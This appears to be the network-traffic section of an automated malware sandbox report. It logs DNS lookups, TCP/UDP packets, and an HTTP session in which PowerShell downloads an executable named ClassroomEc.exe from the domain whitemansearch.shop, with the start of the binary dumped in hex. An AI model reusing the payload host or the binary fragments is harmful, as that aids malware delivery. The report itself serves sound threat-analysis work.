Feb 21, 2024 08:14:10.663927078 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.670285940 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.670437098 CET	49724	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.670443058 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.735578060 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.735660076 CET	49724	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.735671043 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.735713005 CET	49724	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.753962994 CET	49724	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.753993034 CET	443	49724	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.851319075 CET	443	49727	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.851495028 CET	443	49727	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:10.851604939 CET	49727	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.869393110 CET	49727	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:10.869442940 CET	443	49727	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.284291029 CET	49729	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.284329891 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.284421921 CET	49729	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.287029028 CET	49729	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.287045002 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.436120987 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:11.477453947 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.477801085 CET	49729	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.477812052 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.478147030 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.478574991 CET	49729	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.478637934 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.478779078 CET	49729	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.521904945 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.680495024 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.680550098 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.680583954 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.680608988 CET	49729	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.680619955 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.680655003 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.680763006 CET	49729	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.680772066 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.680887938 CET	49729	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.686371088 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.688535929 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.688764095 CET	49729	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.689905882 CET	49729	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.689920902 CET	443	49729	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.811039925 CET	49730	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.811084986 CET	443	49730	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.811191082 CET	49730	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.811546087 CET	49730	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.811563015 CET	443	49730	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.998205900 CET	443	49730	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.998650074 CET	49730	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.998677015 CET	443	49730	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.999042034 CET	443	49730	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.999346972 CET	49730	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:11.999418020 CET	443	49730	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:11.999528885 CET	49730	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:12.041912079 CET	443	49730	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:12.047157049 CET	49730	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:12.178256035 CET	443	49730	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:12.178299904 CET	443	49730	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:12.178324938 CET	443	49730	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:12.178349972 CET	443	49730	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:12.178390026 CET	49730	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:12.178423882 CET	443	49730	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:12.178437948 CET	49730	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:12.180803061 CET	443	49730	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:12.180874109 CET	49730	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:12.193240881 CET	49730	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:12.193270922 CET	443	49730	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:12.193312883 CET	49730	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:12.193372965 CET	49730	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:12.350541115 CET	49731	443	192.168.2.5	142.251.40.100
Feb 21, 2024 08:14:12.350590944 CET	443	49731	142.251.40.100	192.168.2.5
Feb 21, 2024 08:14:12.350778103 CET	49731	443	192.168.2.5	142.251.40.100
Feb 21, 2024 08:14:12.351171017 CET	49731	443	192.168.2.5	142.251.40.100
Feb 21, 2024 08:14:12.351181030 CET	443	49731	142.251.40.100	192.168.2.5
Feb 21, 2024 08:14:12.615690947 CET	443	49731	142.251.40.100	192.168.2.5
Feb 21, 2024 08:14:12.616034031 CET	49731	443	192.168.2.5	142.251.40.100
Feb 21, 2024 08:14:12.616064072 CET	443	49731	142.251.40.100	192.168.2.5
Feb 21, 2024 08:14:12.617130995 CET	443	49731	142.251.40.100	192.168.2.5
Feb 21, 2024 08:14:12.617197990 CET	49731	443	192.168.2.5	142.251.40.100
Feb 21, 2024 08:14:12.617592096 CET	49731	443	192.168.2.5	142.251.40.100
Feb 21, 2024 08:14:12.617654085 CET	443	49731	142.251.40.100	192.168.2.5
Feb 21, 2024 08:14:12.617840052 CET	49731	443	192.168.2.5	142.251.40.100
Feb 21, 2024 08:14:12.617846966 CET	443	49731	142.251.40.100	192.168.2.5
Feb 21, 2024 08:14:12.719055891 CET	49731	443	192.168.2.5	142.251.40.100
Feb 21, 2024 08:14:12.874174118 CET	443	49731	142.251.40.100	192.168.2.5
Feb 21, 2024 08:14:12.874222994 CET	443	49731	142.251.40.100	192.168.2.5
Feb 21, 2024 08:14:12.874249935 CET	443	49731	142.251.40.100	192.168.2.5
Feb 21, 2024 08:14:12.874281883 CET	443	49731	142.251.40.100	192.168.2.5
Feb 21, 2024 08:14:12.874300957 CET	49731	443	192.168.2.5	142.251.40.100
Feb 21, 2024 08:14:12.874332905 CET	443	49731	142.251.40.100	192.168.2.5
Feb 21, 2024 08:14:12.874352932 CET	49731	443	192.168.2.5	142.251.40.100
Feb 21, 2024 08:14:12.877762079 CET	443	49731	142.251.40.100	192.168.2.5
Feb 21, 2024 08:14:12.877846003 CET	49731	443	192.168.2.5	142.251.40.100
Feb 21, 2024 08:14:12.902055025 CET	49731	443	192.168.2.5	142.251.40.100
Feb 21, 2024 08:14:12.902089119 CET	443	49731	142.251.40.100	192.168.2.5
Feb 21, 2024 08:14:12.902101040 CET	49731	443	192.168.2.5	142.251.40.100
Feb 21, 2024 08:14:12.902134895 CET	49731	443	192.168.2.5	142.251.40.100
Feb 21, 2024 08:14:20.016283035 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:20.016366005 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:20.016446114 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:20.020591974 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:20.020644903 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:20.447856903 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:20.447958946 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:20.451282024 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:20.451312065 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:20.451719046 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:20.551567078 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:20.974101067 CET	49703	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:20.974518061 CET	49703	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:20.976772070 CET	49735	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:20.976810932 CET	443	49735	23.1.237.91	192.168.2.5
Feb 21, 2024 08:14:20.977145910 CET	49735	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:20.990920067 CET	49735	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:20.990936995 CET	443	49735	23.1.237.91	192.168.2.5
Feb 21, 2024 08:14:21.017980099 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:21.061904907 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.126708031 CET	443	49703	23.1.237.91	192.168.2.5
Feb 21, 2024 08:14:21.126876116 CET	443	49703	23.1.237.91	192.168.2.5
Feb 21, 2024 08:14:21.289541006 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.289580107 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.289588928 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.289628029 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.289630890 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:21.289648056 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.289663076 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.289684057 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.289702892 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.289706945 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:21.289706945 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:21.289706945 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:21.289716005 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.289729118 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:21.289735079 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.289747000 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:21.289767027 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:21.289782047 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:21.289787054 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.289818048 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.289855003 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:21.316837072 CET	443	49735	23.1.237.91	192.168.2.5
Feb 21, 2024 08:14:21.316962957 CET	49735	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:21.336071968 CET	49735	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:21.336090088 CET	443	49735	23.1.237.91	192.168.2.5
Feb 21, 2024 08:14:21.337156057 CET	443	49735	23.1.237.91	192.168.2.5
Feb 21, 2024 08:14:21.337238073 CET	49735	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:21.337732077 CET	49735	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:21.337790966 CET	443	49735	23.1.237.91	192.168.2.5
Feb 21, 2024 08:14:21.337902069 CET	49735	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:21.337908030 CET	443	49735	23.1.237.91	192.168.2.5
Feb 21, 2024 08:14:21.532071114 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:21.532109022 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.532136917 CET	49732	443	192.168.2.5	13.85.23.86
Feb 21, 2024 08:14:21.532144070 CET	443	49732	13.85.23.86	192.168.2.5
Feb 21, 2024 08:14:21.713648081 CET	443	49735	23.1.237.91	192.168.2.5
Feb 21, 2024 08:14:21.713759899 CET	49735	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:21.714049101 CET	49735	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:21.714155912 CET	443	49735	23.1.237.91	192.168.2.5
Feb 21, 2024 08:14:21.714255095 CET	49735	443	192.168.2.5	23.1.237.91

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 21, 2024 08:14:05.493833065 CET	61830	53	192.168.2.5	1.1.1.1
Feb 21, 2024 08:14:05.494172096 CET	63177	53	192.168.2.5	1.1.1.1
Feb 21, 2024 08:14:05.511769056 CET	51011	53	192.168.2.5	1.1.1.1
Feb 21, 2024 08:14:05.511873960 CET	51550	53	192.168.2.5	1.1.1.1
Feb 21, 2024 08:14:05.512411118 CET	55317	53	192.168.2.5	1.1.1.1
Feb 21, 2024 08:14:05.513000965 CET	57141	53	192.168.2.5	1.1.1.1
Feb 21, 2024 08:14:05.584017992 CET	53	60043	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:05.587074041 CET	53	61830	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:05.587666988 CET	53	63177	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:05.599520922 CET	53	51011	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:05.599586010 CET	53	51550	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:05.600016117 CET	53	55317	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:05.600645065 CET	53	57141	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:06.331773043 CET	53	49516	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:06.410953045 CET	55085	53	192.168.2.5	1.1.1.1
Feb 21, 2024 08:14:06.411271095 CET	64485	53	192.168.2.5	1.1.1.1
Feb 21, 2024 08:14:06.498903036 CET	53	55085	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:06.499413967 CET	53	64485	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:06.959110022 CET	54613	53	192.168.2.5	1.1.1.1
Feb 21, 2024 08:14:07.573193073 CET	53	54613	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:08.275077105 CET	53	49322	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:09.329623938 CET	53	63977	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:10.382775068 CET	53	49203	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:10.746144056 CET	53	56142	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:12.261431932 CET	62958	53	192.168.2.5	1.1.1.1
Feb 21, 2024 08:14:12.261639118 CET	57132	53	192.168.2.5	1.1.1.1
Feb 21, 2024 08:14:12.349150896 CET	53	62958	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:12.349386930 CET	53	57132	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:23.493352890 CET	53	64163	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:42.496587992 CET	53	50627	1.1.1.1	192.168.2.5
Feb 21, 2024 08:14:43.889957905 CET	59869	274	192.168.2.5	192.168.2.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 21, 2024 08:14:05.493833065 CET	192.168.2.5	1.1.1.1	0xeab	Standard query (0)	2no.co	A (IP address)	IN (0x0001)	false
Feb 21, 2024 08:14:05.494172096 CET	192.168.2.5	1.1.1.1	0xa373	Standard query (0)	2no.co	65	IN (0x0001)	false
Feb 21, 2024 08:14:05.511769056 CET	192.168.2.5	1.1.1.1	0x19c5	Standard query (0)	clients2.google.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 08:14:05.511873960 CET	192.168.2.5	1.1.1.1	0xb5ae	Standard query (0)	clients2.google.com	65	IN (0x0001)	false
Feb 21, 2024 08:14:05.512411118 CET	192.168.2.5	1.1.1.1	0xaecb	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 08:14:05.513000965 CET	192.168.2.5	1.1.1.1	0x2cde	Standard query (0)	accounts.google.com	65	IN (0x0001)	false
Feb 21, 2024 08:14:06.410953045 CET	192.168.2.5	1.1.1.1	0x23b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 08:14:06.411271095 CET	192.168.2.5	1.1.1.1	0xfb8d	Standard query (0)	www.google.com	65	IN (0x0001)	false
Feb 21, 2024 08:14:06.959110022 CET	192.168.2.5	1.1.1.1	0xc667	Standard query (0)	whitemansearch.shop	A (IP address)	IN (0x0001)	false
Feb 21, 2024 08:14:12.261431932 CET	192.168.2.5	1.1.1.1	0x45bb	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 08:14:12.261639118 CET	192.168.2.5	1.1.1.1	0x9b90	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 21, 2024 08:14:05.587074041 CET	1.1.1.1	192.168.2.5	0xeab	No error (0)	2no.co		104.21.79.229	A (IP address)	IN (0x0001)	false
Feb 21, 2024 08:14:05.587074041 CET	1.1.1.1	192.168.2.5	0xeab	No error (0)	2no.co		172.67.149.76	A (IP address)	IN (0x0001)	false
Feb 21, 2024 08:14:05.587666988 CET	1.1.1.1	192.168.2.5	0xa373	No error (0)	2no.co			65	IN (0x0001)	false
Feb 21, 2024 08:14:05.599520922 CET	1.1.1.1	192.168.2.5	0x19c5	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 08:14:05.599520922 CET	1.1.1.1	192.168.2.5	0x19c5	No error (0)	clients.l.google.com		142.251.40.174	A (IP address)	IN (0x0001)	false
Feb 21, 2024 08:14:05.599586010 CET	1.1.1.1	192.168.2.5	0xb5ae	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 08:14:05.600016117 CET	1.1.1.1	192.168.2.5	0xaecb	No error (0)	accounts.google.com		142.251.163.84	A (IP address)	IN (0x0001)	false
Feb 21, 2024 08:14:06.498903036 CET	1.1.1.1	192.168.2.5	0x23b	No error (0)	www.google.com		142.250.65.228	A (IP address)	IN (0x0001)	false
Feb 21, 2024 08:14:06.499413967 CET	1.1.1.1	192.168.2.5	0xfb8d	No error (0)	www.google.com			65	IN (0x0001)	false
Feb 21, 2024 08:14:07.573193073 CET	1.1.1.1	192.168.2.5	0xc667	No error (0)	whitemansearch.shop		5.101.153.86	A (IP address)	IN (0x0001)	false
Feb 21, 2024 08:14:12.349150896 CET	1.1.1.1	192.168.2.5	0x45bb	No error (0)	www.google.com		142.251.40.100	A (IP address)	IN (0x0001)	false
Feb 21, 2024 08:14:12.349386930 CET	1.1.1.1	192.168.2.5	0x9b90	No error (0)	www.google.com			65	IN (0x0001)	false

HTTP Request Dependency Graph

2no.co

accounts.google.com

clients2.google.com

fs.microsoft.com

www.google.com

https:

www.bing.com

slscr.update.microsoft.com

update.googleapis.com

clients1.google.com

whitemansearch.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49716	5.101.153.86	80	4408	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 08:14:07.856656075 CET	84	OUT	GET /ClassroomEc.exe HTTP/1.1 Host: whitemansearch.shop Connection: Keep-Alive
Feb 21, 2024 08:14:08.072309971 CET	1286	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Wed, 21 Feb 2024 07:14:07 GMT Content-Type: application/octet-stream Content-Length: 1212711 Last-Modified: Tue, 20 Feb 2024 15:43:47 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "65d4c8b3-128127" Expires: Fri, 22 Mar 2024 07:14:07 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 1f 00 94 82 5b 61 fa d1 5b 61 fa d1 5b 61 fa d1 52 19 7e d1 59 61 fa d1 52 19 6f d1 5c 61 fa d1 52 19 79 d1 4d 61 fa d1 52 19 69 d1 4a 61 fa d1 5b 61 fb d1 98 61 fa d1 34 17 64 d1 59 61 fa d1 34 17 50 d1 5f 61 fa d1 34 17 51 d1 6a 61 fa d1 34 17 60 d1 5a 61 fa d1 34 17 67 d1 5a 61 fa d1 52 69 63 68 5b 61 fa d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b3 be 2e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 7a 02 00 00 ba 00 00 00 00 00 00 f8 7b 02 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 03 00 00 04 00 00 f5 8d 12 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 b5 02 00 b4 00 00 00 00 00 03 00 51 40 00 00 00 00 00 00 00 00 00 00 3f 59 12 00 e8 27 00 00 00 50 03 00 38 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f 78 02 00 00 10 00 00 00 7a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6a 35 00 00 00 90 02 00 00 36 00 00 00 7e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 2b 00 00 00 d0 02 00 00 06 00 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 51 40 00 00 00 00 03 00 00 42 00 00 00 ba 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 15 00 00 00 50 03 00 00 16 00 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ`@!L!Require Windows$[a[a[aR~YaRo\aRyMaRiJa[aa4dYa4P_a4Qja4`Za4gZaRich[aPEL.`z{@p@TQ@?Y'P8.textxz `.rdataj56~@@.data+@.rsrcQ@B@@.reloc`P@B
Feb 21, 2024 08:14:08.072328091 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: UMMMMj$fE}tMEEEMUPMPhPfE}tM(E
Feb 21, 2024 08:14:08.072341919 CET	1286	IN	Data Raw: 33 c0 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 0c 50 8b 4d 08 51 e8 10 00 00 00 83 c4 08 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a 10 8b 45 0c 50 8b 4d 08 51 e8 26 62 02 00 83 c4 0c f7 d8 1b c0 83 c0 01 5d c3 cc cc Data Ascii: 3]UEPMQ]UjEPMQ&b]UQEHMUEBE]U8EBE8]MMUPXBEMQUPMQEUEP=URMM=
Feb 21, 2024 08:14:08.072357893 CET	1286	IN	Data Raw: fc 83 c0 06 50 68 5c 94 42 00 e8 2d fd ff ff 83 c4 08 e9 b8 fd ff ff 68 b4 96 42 00 8b 4d fc 83 c1 02 51 e8 b4 1e 00 00 83 c4 08 f7 d8 1b c0 f7 d8 74 42 8b 55 fc 0f b7 42 06 83 f8 30 74 0c 8b 4d fc 0f b7 51 06 83 fa 31 75 25 8b 45 fc 0f b7 48 08 Data Ascii: Ph\B-hBMQtBUB0tMQ1u%EH wURh,B_;hBEPVt"MQ wjBs!hBEPt7MQ0\|&EH9URB
Feb 21, 2024 08:14:08.072375059 CET	1286	IN	Data Raw: 8b 55 0c 81 e2 00 00 01 00 75 0b 8b 45 b0 0d 00 01 00 00 89 45 b0 8d 4d f4 51 8b 55 08 52 e8 23 1a 00 00 83 c4 08 50 8d 4d e8 e8 77 fe ff ff 8d 4d f4 e8 2f ba 00 00 85 c0 75 1c c7 45 a8 01 00 00 00 8d 4d e8 e8 dc 2d 01 00 8d 4d f4 e8 d4 2d 01 00 Data Ascii: UuEEMQUR#PMwM/uEM-M-E{MEMEEPBt=MujURLBEPPBEM{-Ms-EEM_-MW-E]UEEE
Feb 21, 2024 08:14:08.072390079 CET	1286	IN	Data Raw: 8d 4d f0 e8 98 f8 ff ff b8 01 00 00 00 85 c0 0f 84 da 00 00 00 8d 4d ec 51 8d 4d f0 e8 ff ee ff ff 50 e8 29 28 00 00 83 c4 08 89 45 fc 83 7d fc 00 75 74 8b 55 10 83 c2 02 89 55 10 8b 45 10 0f b7 08 83 f9 30 7c 0b 8b 55 10 0f b7 02 83 f8 39 7e 2c Data Ascii: MMQMP)(E}utUUE0\|U9~,Ma\|Ez~UA\|2MZ'EPMMRMEcHEPMQjUREPM/PMN(E\BMMME
Feb 21, 2024 08:14:08.072527885 CET	1286	IN	Data Raw: 08 83 c0 2c 50 8d 4d d0 51 ff 15 24 90 42 00 eb 4a 8b 55 08 8b 45 c0 89 42 2c 8b 4d c4 89 4a 30 eb 39 6a 66 8b 55 08 8b 02 8b 4d 08 51 8b 50 1c ff d2 89 85 6c ff ff ff 8d 4d b8 e8 fa 09 00 00 8d 4d f4 e8 d2 23 01 00 8d 4d e0 e8 ea 09 00 00 8b 85 Data Ascii: ,PMQ$BJUEB,MJ09jfUMQPlMM#MlCEx4t~M P#u9jhMEPJhMMx#MhdMsMK#McdU,RM &
